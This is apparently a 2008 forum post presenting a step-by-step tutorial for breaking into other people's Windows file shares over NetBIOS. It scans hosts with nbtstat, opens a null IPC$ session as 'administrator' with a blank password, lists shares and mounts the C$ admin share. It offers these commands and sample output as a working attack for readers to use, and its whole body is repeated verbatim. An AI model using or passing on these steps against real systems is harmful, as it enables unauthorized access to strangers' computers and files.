ssym3tryy
May 14th, 2008, 09:36 PM
Searching for open Windows Shares with NetBIOS - a tutorial by sym3try
This is an older exploit, but it still works on many computers.
STEP 1
From the command prompt, type this command:
c:\>nbtstat -A <ip_address>
You will get one of two possible responses:
1. Host Not Found. This means that either the host is down or is blocking your requests. You will have to try another host ip address.
2. You will get an output that resembles this:
C:\>nbtstat -A 192.168.2.10
Wireless Network Connection:
Node IpAddress: [192.168.2.10] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
FRANK-A1EA4AC4D<00> UNIQUE Registered
FRANK-A1EA4AC4D<20> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1E> GROUP Registered
WORKGROUP <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-0D-0B-BD-4C-94
***What you are looking for in this output is for one of the NetBIOS entries to contain a Type of "<20>" which indicates that File Sharing is enabled.***
STEP 2
Initiate a NULL Session with the host.
C:\>net use \\<ip_address>\IPC$ "" /user:administrator
This command attempts to connect to the remote Windows share using the default username of "administrator" with a blank password.
This command will either return a reply of "The Command Completed Successfully" or it will return an error, which would indicate that a unique password is set. (cracking these types of passwords is beyond the scope of this specific tutorial, but hey, feel free to write one and post it :D )
STEP 3
Obtain a list of the host's network shares.
C:\>net view \\<ip_address>
This will list all available network shares.
STEP 4
Connect to the share.
C:\>net use * \\<ip_address>\<share_name>$
Example: net use *\\192.168.2.10\c$
Once this operation completes, open up "My Computer" and the network share should now be available, listed as one of your drives.
Enjoy!
SYM3TRY
Hack the Planet
This is an older exploit, but it still works on many computers.
STEP 1
From the command prompt, type this command:
c:\>nbtstat -A <ip_address>
You will get one of two possible responses:
1. Host Not Found. This means that either the host is down or is blocking your requests. You will have to try another host ip address.
2. You will get an output that resembles this:
C:\>nbtstat -A 192.168.2.10
Wireless Network Connection:
Node IpAddress: [192.168.2.10] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
FRANK-A1EA4AC4D<00> UNIQUE Registered
FRANK-A1EA4AC4D<20> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1E> GROUP Registered
WORKGROUP <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-0D-0B-BD-4C-94
***What you are looking for in this output is for one of the NetBIOS entries to contain a Type of "<20>" which indicates that File Sharing is enabled.***
STEP 2
Initiate a NULL Session with the host.
C:\>net use \\<ip_address>\IPC$ "" /user:administrator
This command attempts to connect to the remote Windows share using the default username of "administrator" with a blank password.
This command will either return a reply of "The Command Completed Successfully" or it will return an error, which would indicate that a unique password is set. (cracking these types of passwords is beyond the scope of this specific tutorial, but hey, feel free to write one and post it :D )
STEP 3
Obtain a list of the host's network shares.
C:\>net view \\<ip_address>
This will list all available network shares.
STEP 4
Connect to the share.
C:\>net use * \\<ip_address>\<share_name>$
Example: net use *\\192.168.2.10\c$
Once this operation completes, open up "My Computer" and the network share should now be available, listed as one of your drives.
Enjoy!
SYM3TRY
Hack the Planet